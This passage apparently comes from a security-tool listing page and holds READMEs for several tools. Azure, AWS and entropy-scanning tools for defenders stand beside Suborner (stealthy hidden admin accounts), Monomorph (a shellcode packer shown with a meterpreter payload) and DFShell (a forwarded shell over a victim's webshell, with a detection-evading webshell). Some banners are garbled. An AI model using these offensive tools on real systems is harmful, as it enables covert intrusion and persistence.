"createdBy": "4257db31-3f22-4c0f-bd57-26cbbd4f5851",
"updatedBy": "4257db31-3f22-4c0f-bd57-26cbbd4f5851"
},
"id": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/resourceGroups/RG-FN-2079/providers/Microsoft.Authorization/roleAssignments/ada69f21-790e-4386-9f47-c9b8a8c15674",
"type": "Microsoft.Authorization/roleAssignments",
"name": "ada69f21-790e-4386-9f47-c9b8a8c15674",
"RoleName": "Contributor"
}]
}]
},
"category": "Access"
},

Basic

Basic controls include checks on the initial ARM object for simple "toggle on/off" boolean settings of said service.

Example: Azure Container Registry adminUser

acr_adminUser


Portal EAST

if (item.properties?.adminUserEnabled == false ){returnObject.isHealthy = true }

Advanced

Advanced controls include checks beyond the initial ARM object, often invoking new requests to get further information about the resource in scope and its relation to other services.

Example: Role Assignments

Besides checking the role assignments of the subscription, an additional check is performed via Azure AD Conditional Access reporting for MFA, verifying that privileged accounts are not protected only by passwords (SPNs with client secrets).

Example: Azure Data Factory

ADF_pipeLineRuns

Azure Data Factory pipeline mapping combines pipelines -> activities -> data targets, and then checks for secrets leaked in the logs via the run history of said activities.



Composite

Composite controls combine two or more control results from the pipeline in order to form one or more new controls. Using composites solves two use cases for EAST:

  1. You can't guarantee the order in which control results are returned in the pipeline
  2. You need to return more than one control result from a single check

Example: composite_resolve_alerts (sketched after the steps below)

  1. Get alerts from Microsoft Cloud Defender on subscription check
  2. Form new controls per resourceProvider for alerts
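
A rough Python sketch of that composite idea (EAST itself is Node.js; the function and field names here are illustrative assumptions):

from collections import defaultdict

def composite_resolve_alerts(alert_results):
    """Group Defender alerts by resourceProvider and emit one derived
    (unhealthy) control per provider that has alerts."""
    per_provider = defaultdict(list)
    for alert in alert_results:
        per_provider[alert["resourceProvider"]].append(alert)
    return [
        {"controlId": f"alerts_{provider}", "isHealthy": False, "metadata": alerts}
        for provider, alerts in per_provider.items()
    ]

print(composite_resolve_alerts([
    {"resourceProvider": "microsoft.web", "alert": "Suspicious process"},
    {"resourceProvider": "microsoft.storage", "alert": "Anonymous access"},
]))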

Reporting

EAST is not focused on providing automated report generation; it mostly provides JSON files with control and evaluation status. The idea is to use separate tooling to create reports, which is fairly trivial to automate via markdown creation scripts and tools such as Pandoc.

  • While the focus is not on reporting, this repo includes example automation for report creation with pandoc to ease reading of the results in a single-document format.

While this tool does not distribute pandoc, pandoc can be used when creating the reports; thus the following citation is added: https://github.com/jgm/pandoc/blob/master/CITATION.cff

cff-version: 1.2.0
title: Pandoc
message: "If you use this software, please cite it as below."
type: software
url: "https://github.com/jgm/pandoc"
authors:
- given-names: John
family-names: MacFarlane
email: jgm@berkeley.edu
orcid: 'https://orcid.org/0000-0003-2557-9090'
- given-names: Albert
family-names: Krewinkel
email: tarleb+github@moltkeplatz.de
orcid: '0000-0002-9455-0796'
- given-names: Jesse
family-names: Rosenthal
email: jrosenthal@jhu.edu

Running EAST scan

This part is a guide on how to run the tool either in Bash on Linux, or in Bash on Azure Cloud Shell (obviously Cloud Shell is Linux too, but it does not require that you have your own Linux box).

⚠️ If you are running the tool in Cloud Shell, you might need to reapply some of the installations, as Cloud Shell does not persist various session settings.

Fire and forget prerequisites on cloud shell

curl -o- https://raw.githubusercontent.com/jsa2/EAST/preview/sh/initForuse.sh | bash;

jump to next step

Detailed prerequisites (this is if you opted not to do the "fire and forget" version)

Prerequisites

git clone https://github.com/jsa2/EAST --branch preview
cd EAST;
npm install

Pandoc installation on cloud shell

# Get pandoc for reporting (first time only)
wget "https://github.com/jgm/pandoc/releases/download/2.17.1.1/pandoc-2.17.1.1-linux-amd64.tar.gz";
tar xvzf "pandoc-2.17.1.1-linux-amd64.tar.gz" --strip-components 1 -C ~

Installing pandoc on distros that support APT

# Get pandoc for reporting (first time only)
sudo apt install pandoc

Login Az CLI and run the scan

# Relogin is required to ensure token cache is placed on session on cloud shell

az account clear
az login

#
cd EAST
# replace the subid below with your subscription ID!
subId=6193053b-408b-44d0-b20f-4e29b9b67394
#
node ./plugins/main.js --batch=10 --nativescope=true --roleAssignments=true --helperTexts=true --checkAad=true --scanAuditLogs --composites --subInclude=$subId


Generate report

cd EAST; node templatehelpers/eastReports.js --doc

  • If you want to include all Azure Security Benchmark results in the report

cd EAST; node templatehelpers/eastReports.js --doc --asb

Export report from cloud shell

pandoc -s fullReport2.md -f markdown -t docx --reference-doc=pandoc-template.docx -o fullReport2.docx


Azure DevOps (experimental): there is an Azure DevOps control for dumping pipeline logs. You can specify the control run as in the following example:

node ./plugins/main.js --batch=10 --nativescope=true --roleAssignments=true --helperTexts=true --checkAad=true --scanAuditLogs --composites --subInclude=$subId --azdevops "organizationName"

Licensing

Community use

  • Share relevant controls across multiple environments as community effort

Company use

  • Companies have the possibility to develop company-specific controls which apply to company-specific work. Companies can then control these implementations by deciding whether or not to share them, based on the operating principles of that company.

Non IPR components

  • Code logic and functions are under the MIT license. Since the code logic and functions are already based on open-source components and vendor APIs, it does not make sense to restrict something that is already based on open source.

If you use this tool as part of your commercial effort, we only require that you follow the very relaxed terms of the MIT license.

Read license

Tool operation documentation

Principles

AZCLI USE

Existing tooling enhanced with Node.js runtime

Use the rich and maintained context of Microsoft Azure CLI login & commands, together with Node.js control flow that supplies enhanced REST requests and maps the results to a schema.

  • This tool does not include or distribute Microsoft Azure CLI, but rather uses it when it has been installed on the source system (Such as Azure Cloud Shell, which is primary platform for running EAST)

Speedup

View more details

✅ Using the Node.js runtime as orchestrator utilises Node's asynchronous nature, allowing batching of requests. Batching of requests utilizes the full extent of Azure Resource Manager's incredible speed.

✅ Compared to running requests one by one, the speedup can be up to 10x when Node executes a batch of requests instead of a single request at a time.
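
Purely as an illustration of the batching pattern (EAST itself is Node.js; this Python asyncio sketch only stands in for the concept):

import asyncio

async def fetch(resource_id: str) -> str:
    await asyncio.sleep(0.2)              # stands in for a single ARM REST call
    return f"result for {resource_id}"

async def scan(resources, batch=10):
    results = []
    for i in range(0, len(resources), batch):
        # each batch runs concurrently; batches are kept apart to respect throttling
        results += await asyncio.gather(*(fetch(r) for r in resources[i:i + batch]))
    return results

print(asyncio.run(scan([f"res-{n}" for n in range(30)])))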

Parameters reference

Example:

node ./plugins/main.js --batch=10 --nativescope --roleAssignments --helperTexts=true --checkAad --scanAuditLogs --composites --shuffle --clearTokens
Param — description — default if undefined:

  • --nativescope — Currently mandatory parameter — no values
  • --shuffle — Can help with throttling. Shuffles the resource list to reduce the possibility of the resource provider throttling threshold being met — no values
  • --roleAssignments — Checks controls as per microsoft.authorization — no values
  • --includeRG — Checks controls with ResourceGroups as per microsoft.authorization — no values
  • --checkAad — Checks controls as per microsoft.azureactivedirectory — no values
  • --subInclude — Defines subscription scope — no default; requires subscription ID(s); if not defined, will enumerate all subscriptions the user has access to
  • --namespace — text filter which matches the full, or part of the, resource ID (example: /microsoft.storage/storageaccounts matches all storage accounts in the scope) — optional parameter
  • --notIncludes — text filter which matches the full, or part of the, resource ID (example: /microsoft.storage/storageaccounts excludes all storage accounts in the scope) — optional parameter
  • --batch — size of the batch between throttles — 5
  • --wait — wait interval between batches — 1500
  • --scanAuditLogs — optional parameter; when defined in hours, toggles Azure Activity Log scanning for weak authentication events (defined in: scanAuditLogs) — 24h
  • --composites — read composites — no values
  • --clearTokens — clears tokens in the session folder; use this if you get authorization errors, or have just changed to another az login account (use az account clear if you want to clear the AZ CLI cache too) — no values
  • --tag — filter all results at the end based on a single tag, e.g. --tag=svc=aksdev — no values
  • --ignorePreCheck — use this option when used with browser delegated tokens — no values
  • --helperTexts — will append text descriptions from general to manual controls — no values
  • --reprocess — will update results in the existing content.json; useful for incremental runs — no values

Parameters reference for example report:

node templatehelpers/eastReports.js --asb 
Param — description — default if undefined:

  • --asb — gets all ASB results available to users — no values
  • --policy — gets all Policy results available to users — no values
  • --doc — prints pandoc string for export to console — no values

(Highly experimental) Running in restricted environments where only browser use is available

Read here Running in restricted environments

Developing controls

Developer guide including control flow description is here dev-guide.md

Updates and examples

Auditing Microsoft.Web provider (Functions and web apps)

✅ Check roles that are assigned to the function's managed identity in Azure AD and in all Azure subscriptions the audit account has access to
✅ Relation mapping: check which key vaults the function uses across all subscriptions the audit account has access to
✅ Check if Azure AD authentication is enabled
✅ Check that generation of access tokens to the API requires assignment (.appRoleAssignmentRequired)
✅ Audit bindings
  • Function or Azure AD authentication enabled
  • Count and type of triggers

✅ Check if SCM and FTP endpoints are secured


Azure RBAC baseline authorization

โš ๏ธDetect principals in privileged subscriptions roles protected only by password-based single factor authentication.
  • Checks for users without MFA policies applied for set of conditions
  • Checks for ServicePrincipals protected only by password (as opposed to using Certificate Credential, workload federation and or workload identity CA policy)

Maps to App Registration Best Practices

  • An unused credential on an application can result in a security breach. While it's convenient to use password secrets as a credential, we strongly recommend that you use x509 certificates as the only credential type for getting tokens for your application.

✅ State healthy - User result example

{ 
"subscriptionName": "EAST -msdn",
"friendlyName": "joosua@thx138.onmicrosoft.com",
"mfaResults": {
"oid": "138ac68f-d8a7-4000-8d41-c10ff26a9097",
"appliedPol": [{
"GrantConditions": "challengeWithMfa",
"policy": "baseline",
"oid": "138ac68f-d8a7-4000-8d41-c10ff26a9097"
}],
"checkType": "mfa"
},
"basicAuthResults": {
"oid": "138ac68f-d8a7-4000-8d41-c10aa26a9097",
"appliedPol": [{
"GrantConditions": "challengeWithMfa",
"policy": "baseline",
"oid": "138ac68f-d8a7-4000-8d41-c10aa26a9097"
}],
"checkType": "basicAuth"
},
}

โš ๏ธState unHealthy - Application principal example

{ 
"subscriptionName": "EAST - HoneyPot",
"friendlyName": "thx138-kvref-6193053b-408b-44d0-b20f-4e29b9b67394",
"creds": {
"@odata.context": "https://graph.microsoft.com/beta/$metadata#servicePrincipals(id,displayName,appId,keyCredentials,passwordCredentials,servicePrincipalType)/$entity",
"id": "babec804-037d-4caf-946e-7a2b6de3a45f",
"displayName": "thx138-kvref-6193053b-408b-44d0-b20f-4e29b9b67394",
"appId": "5af1760e-89ff-46e4-a968-0ac36a7b7b69",
"servicePrincipalType": "Application",
"keyCredentials": [],
"passwordCredentials": [],
"OnlySingleFactor": [{
"customKeyIdentifier": null,
"endDateTime": "2023-10-20T06:54:59.2014093Z",
"keyId": "7df44f81-a52c-4fd6-b704-4b046771f85a",
"startDateTime": "2021-10-20T06:54:59.2014093Z",
"secretText": null,
"hint": nu ll,
"displayName": null
}],
"StrongSingleFactor": []
}
}

Contributing

Following methods work for contributing for the time being:

  1. Submit a pull request with code / documentation change
  2. Submit a issue
    • an issue can be:
    • ⚠️ Problem (issue)
    • Feature request
    • ❓ Question

Other

  1. By default EAST tries to work with the current dependencies. Introducing new (direct) dependencies is not directly encouraged with EAST. If such a vital dependency is introduced, then review the licensing of that dependency, and update readme.md - dependencies
    • There is nothing to prevent you from creating your own fork of EAST with your own dependencies


Aws-Security-Assessment-Solution - An AWS Tool To Help You Create A Point In Time Assessment Of Your AWS Account Using Prowler And Scout As Well As Optional AWS Developed Ransomware Checks


Self-Service Security Assessment tool

Cybersecurity remains a very important topic and point of concern for many CIOs, CISOs, and their customers. To meet these important concerns, AWS has developed a primary set of services customers should use to aid in protecting their accounts. Amazon GuardDuty, AWS Security Hub, AWS Config, and AWS Well-Architected reviews help customers maintain a strong security posture over their AWS accounts. As more organizations deploy to the cloud, especially if they are doing so quickly, and they have not yet implemented the recommended AWS Services, there may be a need to conduct a rapid security assessment of the cloud environment.

With that in mind, we have worked to develop an inexpensive, easy to deploy, secure, and fast solution to provide our customers two (2) security assessment reports. These security assessments are from the open source projects "Prowler" and "ScoutSuite." Each of these projects conducts an assessment based on AWS best practices and can help quickly identify any potential risk areas in a customer's deployed environment. If you are interested in conducting these assessments on a continuous basis, AWS recommends enabling Security Hub's Foundational Security Best Practices standard. If you are interested in integrating your Prowler assessment results with Security Hub, you can also do that from Prowler natively following the instructions here.

In addition, we have developed custom modules that speak to customer concerns around threats and misconfigurations; currently this includes checks for ransomware-specific findings.


ARCHITECTURE OVERVIEW

Overview - Open Source project checks

The architecture we deploy is a very simple VPC with two (2) subnets, one (1) NAT Gateway, one (1) EC2 instance, and one (1) S3 Bucket. The EC2 instance uses Amazon Linux 2 (the latest published AMI), is patched on boot, pulls down the two projects (Prowler and ScoutSuite), runs the assessments and then delivers the reports to the S3 Bucket. The EC2 instance does not deploy with any EC2 Key Pair, does not have any open ingress rules on its Security Group, and is placed in the Private Subnet so it does not have direct internet access. After completion of the assessment and the delivery of the reports, the system can be terminated.

The deployment is accomplished through the use of CloudFormation. A single CloudFormation template is used to launch a few other templates (in a modular approach). No parameters (user input) are required, and the automated build-out of the environment will take on average less than 10 minutes to complete. These templates are provided for review in this GitHub repository.

Once the EC2 instance has been created and begins the two assessments, it will take somewhere around 40 minutes to complete. At the end of the assessments, and after the two reports are delivered to the S3 bucket, the instance will automatically shut down. You may at that point safely terminate the instance.

How to deploy this tool

How do I read the reports?

Diagram

Here is a diagram of the architecture.

What will be created

  • A VPC

    • This will be a /26 for the VPC
    • This will include 2 subnets both in the same Availability Zone, one Public and one Private
    • This will include the required Route Tables and ACLs
  • An EIP

    • For use by the NAT Gateway
  • A NAT Gateway

    • This is required for the instance to download both Prowler and ScoutSuite as well as to make the API Calls
  • A Security Group

    • For the Instance
  • A single m5a.large instance with a 10 GB gp2 EBS volume

    • This is the instance in which Prowler and ScoutSuite will run
    • It will be in a Private Subnet
    • It will not have an EC2 Key Pair
    • It will not allow ingress traffic on the Security Group
  • An Instance Role

    • This Role is required so that Prowler and ScoutSuite can run the API calls from the EC2 Instance
  • An IAM Policy

    • Some IAM permissions are required for Prowler and ScoutSuite
      • Prowler info here
      • ScoutSuite info here
  • An S3 Bucket

    • This is the location where the reports will be delivered
    • It will take about 40 minutes for the reports to show up

Open source security Assessments

These security assessments are from the open source projects "Prowler" and "ScoutSuite." Each of these projects conducts an assessment based on AWS best practices and can help quickly identify any potential risk areas in a customer's deployed environment.

1. Prowler

The first assessment is from Prowler.

  • Prowler follows the guidelines of the CIS Amazon Web Services Foundations Benchmark (49 checks) and has 40 additional checks, including ones related to GDPR and HIPAA; in total, Prowler offers over 160 checks.

2. ScoutSuite

The second assessment is from ScoutSuite

  • ScoutSuite has been around since 2012, originally as Scout, then Scout2, and now ScoutSuite. It provides a set of files that can be viewed in your browser and conducts a wide range of checks.

Overview of optional modules

► Check for Common Security Mistakes module

When enabled, this module will deploy a lambda function that checks for common security mistakes highlighted in https://www.youtube.com/watch?v=tmuClE3nWlk.

What will be created

A Lambda function that will perform the checks. Some of the checks include:

  • GuardDuty set to alert on findings
  • GuardDuty enabled across all regions
  • Prevent accidental key deletion
  • Existence of a Multi-region CloudTrail
  • CloudTrail validation enabled
  • No local IAM users
  • Roles tuned for least privilege in last 90 days
  • Alerting for root account use
  • Alerting for local IAM user create/delete
  • Use of Managed Prefix Lists in Security Groups
  • Public S3 Buckets

► Ransomware modules

When enabled, this module will deploy separate functions that can help customers with evaluating their environment for ransomware infection and susceptibility to ransomware damage.

What will be created

  • AWS Core security services enabled
    • Checks for AWS security service enablement in all regions where applicable (GuardDuty, SecurityHub)
  • Data protection checks
    • Checks for EBS volumes with no snapshot
    • Checks for outdated OS running
    • Checks for S3 bucket replication JobStatus
    • Checks for EC2 instances that can not be managed with SSM
    • Checks for Stale IAM roles that have been granted S3 access but have not used them in the last 60 days
    • Checks for S3 deny public access enablement
    • Checks to see if DNSSEC is enabled for public hosted zones in Amazon Route 53
    • Checks to see if logging is enabled for services relevant to ransomware (i.e. CloudFront, Lambda, Route53 Query Logging, and Route 53 Resolver Logging).
    • Checks to see if Route 53 Resolver DNS Firewall is enabled across all relevant regions
    • Checks to see if there are any Access Keys that have not been used in last 90 days

► SolarWinds module

When enabled, this module will deploy separate functions that can help customers with evaluating their environment for the SolarWinds vulnerability. The checks are based on CISA Alert AA20-352A, Appendix A & B.

Note: Prior to enablement of this module, please read the module documentation which reviews the steps that need to be completed prior to using this module.

Note: This module MUST be run separately as its own stack, select the S3 URL SelfServiceSecSolar.yml to deploy

What will be created

  • Athena query - AA20352A IP IOC
    • This Athena query will scan your VPC flow logs for IP addresses from the CISA AA20-352A.
  • SSM Automation document - SolorWindsAA20-352AAutomatedScanner
    • This is a systems manager automation document that will scan Windows EC2 instances for impacted .dll files from CISA AA20-352A.
  • Route53 DNS resolver query - AA20352A DNS IOC
    • This Athena query will scan your DNS logs for customers that have enabled DNS query logging

Frequently Asked Questions (FAQ)

  1. Is there a cost?
    • Yes. This should normally cost less than $1 for an hour of use.
  2. Is this a continuous monitoring and reporting tool?
    • No. This is a one-time assessment; we urge customers to leverage tooling like AWS Security Hub for ongoing assessments.
  3. Why does the CloudFormation service error when deleting the stack?
    • You must remove the objects (reports) out of the S3 bucket first
  4. Does this integrate with GuardDuty, Security Hub, CloudWatch, etc.?
    • Not at this time. In a future sprint we plan to incorporate integration with AWS services like Security Hub and GuardDuty. However, you can follow the instructions in this blog to integrate Prowler and Security Hub.
  5. How do I remediate the issues in the reports?
    • Generally, the issues should be described in the report with readily identifiable corrections. Please follow up with the public documentation for each tool (Prowler and ScoutSuite) as well. If this is insufficient, please reach out to your AWS Account team and we will be more than happy to help you understand the reports and work towards remediating issues.

Security

See CONTRIBUTING for more information.

License

This project is licensed under the Apache-2.0 License.



Suborner - The Invisible Account Forger


What's this?

A simple program to create a Windows account you will only know about :)

  • Create invisible local accounts without net user or Windows OS user management applications (e.g. netapi32::netuseradd)
  • Works on all Windows NT Machines (Windows XP to 11, Windows Server 2003 to 2022)
  • Impersonate through RID Hijacking any existing account (enabled or disabled) after a successful authentication

Create an invisible machine account with administrative privileges, and without invoking that annoying Windows Event Logger to report its creation!


Where can I see more?

Released at Black Hat USA 2022: Suborner: A Windows Bribery for Invisible Persistence

How can I use this?

Build

  • Make sure you have .NET 4.0 and Visual Studio 2019
  • Clone this repo: git clone https://github.com/r4wd3r/Suborner/
  • Open the .sln with Visual Studio
  • Build x86, x64 or both versions
  • Bribe Windows!

Release

Download the latest release and pwn!

Usage

Thanks!

This attack would not have been possible without the great research done by:

What's next?

Hack Suborn the planet!



Monomorph - MD5-Monomorphic Shellcode Packer - All Payloads Have The Same MD5 Hash

                                                
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฆโ•โ•โ•
โ•”โ•โ•ฆโ•โ•— โ•”โ•โ•— โ•”โ•โ•— โ•”โ•โ•— โ•”โ•โ•ฆโ•โ•— โ•”โ•โ•— โ•”โ•โ•โ•”โ•โ•— โ• โ•โ•—
โ•โ•ฉ โ•ฉ โ•ฉโ•โ•šโ•โ•โ•โ•ฉ โ•ฉโ•โ•šโ•โ•โ•โ•ฉ โ•ฉ โ•ฉโ•โ•šโ•โ•โ•โ•ฉ โ• โ•โ•โ•โ•ฉ โ•ฉโ•
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฉโ•โ•โ•โ•โ•โ•โ•
By Retr0id

โ•โ•โ• MD5-Monomorphic Shellcode Packer โ• โ•โ•


USAGE: python3 monomorph.py input_file output_file [payload_file]

What does it do?

It packs up to 4KB of compressed shellcode into an executable binary, near-instantly. The output file will always have the same MD5 hash: 3cebbe60d91ce760409bbe513593e401

Currently, only Linux x86-64 is supported. It would be trivial to port this technique to other platforms, although each version would end up with a different MD5. It would also be possible to use a multi-platform polyglot file like APE.

Example usage:

$ python3 monomorph.py bin/monomorph.linux.x86-64.benign bin/monomorph.linux.x86-64.meterpreter sample_payloads/bin/linux.x64.meterpreter.bind_tcp.bin

Why?

People have previously used single collisions to toggle a binary between "good" and "evil" modes. Monomorph takes this concept to the next level.

Some people still insist on using MD5 to reference file samples, for various reasons that don't make sense to me. If any of these people end up investigating code packed using Monomorph, they're going to get very confused.

How does it work?

For every bit we want to encode, a colliding MD5 block has been pre-calculated using FastColl. As summarised here, each collision gives us a pair of blocks that we can swap out without changing the overall MD5 hash. The loader checks which block was chosen at runtime, to decode the bit.
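
A rough sketch of that encode/decode step in Python (not Monomorph's actual loader; the names and layout below are assumptions for illustration):

BLOCK = 64  # MD5 processes the input in 64-byte blocks

def encode_bits(bits, pairs):
    """Choose one member of each precomputed colliding pair per bit; either
    choice leaves the file's overall MD5 unchanged."""
    return b"".join(pair[bit] for bit, pair in zip(bits, pairs))

def decode_bits(packed: bytes, pairs, region_offset: int):
    """pairs[i] is the colliding (block_a, block_b) pair for bit i; whichever
    member occupies slot i in the packed file encodes that bit."""
    bits = []
    for i, (block_a, block_b) in enumerate(pairs):
        slot = packed[region_offset + i * BLOCK : region_offset + (i + 1) * BLOCK]
        bits.append(0 if slot == block_a else 1)
    return bits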

To encode 4KB of data, we need to generate 4*1024*8 collisions (which takes a few hours), taking up 4MB of space in the final file.

To speed this up, I made some small tweaks to FastColl to make it even faster in practice, enabling it to be run in parallel. I'm sure there are smarter ways to parallelise it, but my naive approach is to start N instances simultaneously and wait for the first one to complete, then kill all the others.

Since I've already done the pre-computation, reconfiguring the payload can be done near-instantly. Swapping the state of the pre-computed blocks is done using a technique implemented by Ange Albertini.

Is it detectable?

Yes. It's not very stealthy at all, nor does it try to be. You can detect the collision blocks using detectcoll.



Sandfly-Entropyscan - Tool To Detect Packed Or Encrypted Binaries Related To Malware, Finds Malicious Files And Linux Processes And Gives Output With Cryptographic Hashes


What is sandfly-entropyscan?

sandfly-entropyscan is a utility to quickly scan files or running processes and report on their entropy (measure of randomness) and if they are a Linux/Unix ELF type executable. Some malware for Linux is packed or encrypted and shows very high entropy. This tool can quickly find high entropy executable files and processes which often are malicious.


Features

  • Written in Golang and is portable across multiple architectures with no modifications.
  • Standalone binary requires no dependencies and can be used instantly without loading any libraries on suspect machines.
  • Not affected by LD_PRELOAD style rootkits that are cloaking files.
  • Built-in PID busting to find hidden/cloaked processes from certain types of Loadable Kernel Module (LKM) rootkits.
  • Generates entropy and also MD5, SHA1, SHA256 and SHA512 hash values of files.
  • Can be used in scanning scripts to find problems automatically.
  • Can be used by incident responders to quickly scan and zero in on potential malware on a Linux host.

Why Scan for Entropy?

Entropy is a measure of randomness. For binary data, 0.0 is not random and 8.0 is perfectly random. Good crypto looks like random white noise and will be near 8.0. Good compression removes redundant data, making it appear more random than if it was uncompressed, and usually will be 7.7 or above.

A lot of malware executables are packed to avoid detection and make reverse engineering harder. Most standard Linux binaries are not packed because they aren't trying to hide what they are. Searching for high entropy files is a good way to find programs that could be malicious just by having these two attributes: high entropy and being executable.
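
For reference, the entropy measured here is Shannon entropy over byte frequencies, expressed in bits per byte; a minimal illustrative sketch in Python (sandfly-entropyscan itself is written in Go):

import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, up to 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())

print(round(shannon_entropy(b"\x00" * 4096), 2))          # 0.0  (no randomness)
print(round(shannon_entropy(bytes(range(256)) * 16), 2))  # 8.0  (uniform distribution)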

How Do I Use This?

Usage of sandfly-entropyscan:

-csv output results in CSV format (filename, path, entropy, elf_file [true|false], MD5, SHA1, SHA256, SHA512)

-delim change the default delimiter for CSV files of "," to one of your choosing ("|", etc.)

-dir string directory name to analyze

-file string full path to a single file to analyze

-proc check running processes (defaults to ELF only check)

-elf only check ELF executables

-entropy float show any file/process with entropy greater than or equal to this value (0.0 min - 8.0 max, defaults 0 to show all files)

-version show version and exit

Examples

Search for any file that is executable under /tmp:

sandfly-entropyscan -dir /tmp -elf

Search for high entropy (7.7 and higher) executables (often packed or encrypted) under /var/www:

sandfly-entropyscan -dir /var/www -elf -entropy 7.7

Generates entropy and cryptographic hashes of all running processes in CSV format:

sandfly-entropyscan -proc -csv

Search for any process with an entropy higher than 7.7 indicating it is likely packed or encrypted:

sandfly-entropyscan -proc -entropy 7.7

Generate entropy and cryptographic hash values of all files under /bin and output to CSV format (for instance to save and compare hashes):

sandfly-entropyscan -dir /bin -csv

Scan a directory for all files (ELF or not) with entropy greater than 7.7: (potentially large list of files that are compressed, png, jpg, object files, etc.)

sandfly-entropyscan -dir /path/to/dir -entropy 7.7

Quickly check a file and generate entropy, cryptographic hashes and show if it is executable:

sandfly-entropyscan -file /dev/shm/suspicious_file

Use Cases

Do spot checks on systems you think have a malware issue. Or you can automate the scan so you will get output if something with high entropy shows up in a place you didn't expect. Or simply flag any executable ELF type file that is somewhere strange (e.g. hanging out in /tmp or under a user's HTML directory). For instance:

Did a high entropy binary show up under the system /var/www directory? Could be someone put a malware dropper on your website:

sandfly-entropyscan -dir /var/www -elf -entropy 7.7

Setup a cron task to scan your /tmp, /var/tmp, and /dev/shm directories for any kind of executable file whether it's high entropy or not. Executable files under tmp directories can frequently be a malware dropper.

sandfly-entropyscan -dir /tmp -elf

sandfly-entropyscan -dir /var/tmp -elf

sandfly-entropyscan -dir /dev/shm -elf

Setup another cron or automated security sweep to spot check your systems for highly compressed or encrypted binaries that are running:

sandfly-entropyscan -proc -entropy 7.7

Build

git clone https://github.com/sandflysecurity/sandfly-entropyscan.git

  • Go into the repo directory and build it:

go build

  • Run the binary with your options:

./sandfly-entropyscan

Build Scripts

There are some basic build scripts that build for various platforms. You can use these to build, or modify them to suit. For incident responders, it might be useful to keep pre-compiled binaries ready to go on your investigation box.

build.sh - Build for current OS you're running on when you execute it.

ELF Detection

We use a simple method for seeing if a file may be an executable ELF type. We can spot ELF format files for multiple platforms. Even if malware has Intel/AMD, MIPS and Arm dropper binaries we will still be able to spot all of them.

False Positives

It's possible to flag a legitimate binary that has a high entropy because of how it was compiled, or because it was packed for legitimate reasons. Other files like .zip, .gz, .png, .jpg and such also have very high entropy because they are compressed formats. Compression removes redundancy in a file which makes it appear to be more random and has higher entropy.

On Linux, you may find some kinds of libraries (.so files) get flagged if you scan library directories.

However, it is our experience that executable binaries that also have high entropy are often malicious. This is especially true if you find them in areas where executables normally shouldn't be (such as again tmp or html directories).

Performance

The entropy calculation requires reading in all the bytes of the file and tallying them up to get a final number. It can use a lot of CPU and disk I/O, especially on very large file systems or very large files. The program has an internal limit where it won't calculate entropy on any file over 2GB, nor will it try to calculate entropy on any file that is not a regular file type (e.g. won't try to calculate entropy on devices like /dev/zero).

Then we calculate MD5, SHA1, SHA256 and SHA512 hashes. Each of these requires going over the file as well. It's reasonable speed on modern systems, but if you are crawling a very large file system it can take some time to complete.

If you tell the program to only look at ELF files, then the entropy/hash calculations won't happen unless it is an ELF type and this will save a lot of time (e.g. it will ignore massive database files that aren't executable).

If you want to automate this program, it's best to not have it crawl the entire root file system unless you want that specifically. A targeted approach will be faster and more useful for spot checks. Also, use the ELF flag as that will drastically reduce search times by only processing executable file types.

Incident Response

For incident responders, running sandfly-entropyscan against the entire top-level "/" directory may be a good idea just to quickly get a list of likely packed candidates to investigate. This will spike CPU and disk I/O. However, you probably don't care at that point since the box has been mining cryptocurrency for 598 hours anyway by the time the admins noticed.

Again, use the ELF flag to get to the likely problem candidate executables and ignore the noise.

Testing

There is a script called scripts/testfiles.sh that will make two files. One will be full of random data and one will not be random at all. When you run the script it will make the files and run sandfly-entropyscan in executable detection mode. You should see two files. One with very high entropy (at or near 8.0) and one full of non-random data that should be at 0.00 for low entropy. Example:

./testfiles.sh

Creating high entropy random executable-like file in current directory.

Creating low entropy executable-like file in current directory.

high.entropy.test, entropy: 8.00, elf: true

low.entropy.test, entropy: 0.00, elf: true

You can also load up the upx utility and compress an executable and see what values it returns.

Agentless Linux Security

Sandfly Security produces an agentless endpoint detection and incident response platform (EDR) for Linux. Automated entropy checks are just one of thousands of things we search for to find intruders without loading any software on your Linux endpoints.

Get a free license and learn more below:

https://www.sandflysecurity.com @SandflySecurity



DFShell - The Best Forwarded Shell


[ASCII art banner: DFSHELL]

D3Ext's Forwarded Shell is a python3 script which uses mkfifo to simulate a shell on the victim machine. It creates a hidden directory in /dev/shm/.fs/ where the fifos are stored. You can even have a tty over a webshell.
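
A minimal Python sketch of that forwarded-shell idea (not DFShell's actual code; the webshell URL, parameter name and fifo paths are assumptions for illustration):

import requests

URL, PARAM = "http://10.10.10.10/webshell.php", "cmd"

def run(cmd: str) -> str:
    # the webshell executes whatever lands in its command parameter
    return requests.get(URL, params={PARAM: cmd}).text

# One-time setup on the victim: a fifo feeds a persistent /bin/sh whose output
# goes to a file, so state (cwd, env) survives between HTTP requests.
run("mkdir -p /dev/shm/.fs; mkfifo /dev/shm/.fs/input; "
    "tail -f /dev/shm/.fs/input | /bin/sh > /dev/shm/.fs/output 2>&1 &")

# Each command is written into the fifo, then the accumulated output is read back.
run("echo 'id' > /dev/shm/.fs/input")
print(run("cat /dev/shm/.fs/output"))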

In case you want a good webshell with code obfuscation, a login panel and more functions, you have this webshell (scripted by me). You can change the username and the password at the top of the file. It also has a little protection in case of being discovered: if the webshell is accessed from localhost it returns a 404 status code.


Why you should use DFShell?

To use other forwarded shells you have to edit the script to change the URL and the parameter of the webshell, but DFShell uses command-line arguments to quickly pass them to the script (-u/--url and -p/--parameter). The script has pretty, colored output, and custom commands to upload and download files from the target and to do port and host discovery; it also deletes the files created on the victim if you press Ctrl + C or simply exit the shell.

*If you change the current user from the webshell (or anything gets unstable), execute: 'sh'*

Installation:

Install with pip

pip3 install dfshell

Install from source

git clone https://github.com/D3Ext/DFShell
cd DFShell
pip3 install -r requirements

One-liner

git clone https://github.com/D3Ext/DFShell && cd DFShell && pip3 install -r requirements

Usage:

It's simple: you pass the URL of the webshell and the parameter that executes commands. I recommend the simplest webshell.

